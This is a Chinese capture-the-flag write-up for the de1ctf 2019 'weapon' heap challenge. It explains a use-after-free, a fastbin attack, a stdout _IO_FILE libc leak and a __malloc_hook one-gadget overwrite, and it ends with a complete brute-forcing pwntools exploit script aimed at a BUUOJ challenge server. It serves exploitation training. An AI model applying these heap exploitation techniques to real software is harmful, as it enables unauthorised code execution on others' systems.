de1ctf_2019_weapon writeup

buu刷题记录—de1ctf_2019_weapon

静态分析

checksec一波，保护全开，ida分析，发现时经典的堆菜单题目。有add，delete和edit操作，没有show函数，并且保护全开无法劫持got表。那么这题大概率是要用IO来泄露libc了。

add函数把堆块申请范围限制在了0x60以内，也就是说我们只能申请fastbin大小的堆块。edit函数就是中规中矩的按照之前的size修改堆块的内容。delete函数在堆块被free之后没有把指针置空存在UAF的漏洞。那么我们的思路大概就是先通过uaf进行堆块重叠然后修改size，free之后得到一个unsorted bin，然后再修改回fastbin将它申请到stdout附近通过IO泄露libc地址，最后再来一次fastbin attack劫持malloc hook放上onegadget 去getshell，这题需要用realloc 调整栈来适应onegadget，我们后面再说。

泄露libc的地址

因为地址都是未知的，所以一开始要通过释放两个相同大小的fastbin来让其中一个fastbin中留下另一个fastbin的地址，再通过修改最后一字节让fastbin的fd来让第二个chunk申请到可以造成堆重叠的地方便于我们修改size。

add(0x58,0,b'a'*0x48+p64(0x61))#在合适的地方伪造chunk
add(0x60,1,b'a')
add(0x18,2,b'a')
add(0x58,3,b'a')

free(1)#提前free让fastbin中存在这个chunk
free(3)
free(0)

可以看到第一个chunk的fd已经有了第四个chunk的地址，并且在第一个堆块中存在一个伪造的0x61作为fake chunk的size，所以接下来我们只要edit 0 50就能够产生fastbin attack了。

edit(0,p8(0x50))

add(0x58,4,b'a')
add(0x58,5,b'a'*8+p64(0x91))#修改第二个堆块的size

free(1)#释放unsorted bin 让bin的fd中留下libc的地址
edit(1,p16(0xa5dd))

edit(5,b'a'*8+p64(0x71))
add(0x60,6,b'a')
add(0x60,7,b'\0'*0x33+p64(0xfbad1887)+p64(0)*3+b'\0')

libc_addr=u64(p.recvuntil(b'\x7f',timeout=0.5)[-6:]+b'\0\0')-0x3c5600
success('libc_addr:'+hex(libc_addr))

这一波操作就能成功泄露libc了，但是由于内存页是后三位对齐，我们填充是以字节为单位的，所以这里需要爆破一半个字节。

劫持malloc_hook

这里没什么好说的，就是通过uaf的方法把堆块申请到malloc_hook-0x23的地方，写mallochook为reallochook，再把realloc hook写上对应的one gadget，这里需要注意的是realloc不一定直接就行了，需要适当跳过一些push或这pop之类的指令来调整栈中的0到合适的位置，这里我用了第2个onegadget，用realloc + 4的地方来调整栈

#one=[0x45226,0x4527a,0xf03a4,0xf1247]
one=[0x45216,0x4526a,0xf02a4,0xf1147]

free(1)
edit(1,p64(libc_addr+libc.sym['__malloc_hook']-0x23))
add(0x60,1,b'a')
add(0x60,8,b'a'*0xb+p64(libc_addr+one[1])+p64(libc_addr+libc.sym['realloc']+4))
p.sendlineafter(b'choice >>',b'1')
p.sendlineafter(b'weapon: ',str(1))
p.sendlineafter(b'index: ',str(1))

exp

最后附上爆破的脚本

from pwn import *

#context.log_level='debug'
context.arch='amd64'
context.os='linux'
def conn(x,file_name):
    if x:
        p=process(file_name)
        libc=ELF('./libc/libc-2.23-64.so')
    else:
        p=remote('node4.buuoj.cn',29410)
        libc=ELF('./libc/libc-2.23-buu64.so')
    return ELF(file_name),libc,p
    
def add(size,index,name):
    p.sendlineafter(b'choice >>',b'1')
    p.sendlineafter(b'weapon: ',str(size))
    p.sendlineafter(b'index: ',str(index))
    p.sendafter(b'name:',name)


    
def free(index):
    p.sendlineafter(b'choice >>',b'2')
    p.sendlineafter(b'idx :',str(index))

def edit(index,payload):
    p.sendlineafter(b'choice >>',b'3')
    p.sendlineafter(b'idx: ',str(index))
    p.sendafter(b'content:',payload)
    
def pwn():
    global p
    elf,libc,p=conn(0,'./de1ctf_2019_weapon')

    add(0x58,0,b'a'*0x48+p64(0x61))
    add(0x60,1,b'a')
    add(0x18,2,b'a')
    add(0x58,3,b'a')

    free(1)
    free(3)
    free(0)
    #gdb.attach(p)
    edit(0,p8(0x50))

    add(0x58,4,b'a')
    add(0x58,5,b'a'*8+p64(0x91))

    free(1)
    edit(1,p16(0xa5dd))

    edit(5,b'a'*8+p64(0x71))
    add(0x60,6,b'a')
    add(0x60,7,b'\0'*0x33+p64(0xfbad1887)+p64(0)*3+b'\0')

    libc_addr=u64(p.recvuntil(b'\x7f',timeout=0.5)[-6:]+b'\0\0')-0x3c5600
    success('libc_addr:'+hex(libc_addr))

    #one=[0x45226,0x4527a,0xf03a4,0xf1247]
    one=[0x45216,0x4526a,0xf02a4,0xf1147]

    free(1)
    edit(1,p64(libc_addr+libc.sym['__malloc_hook']-0x23))
    add(0x60,1,b'a')
    add(0x60,8,b'a'*0xb+p64(libc_addr+one[1])+p64(libc_addr+libc.sym['realloc']+4))
    p.sendlineafter(b'choice >>',b'1')
    p.sendlineafter(b'weapon: ',str(1))
    p.sendlineafter(b'index: ',str(1))
    p.interactive()

if __name__=='__main__':
    while 1:
        try:
            pwn()
        except:
            p.close()

结果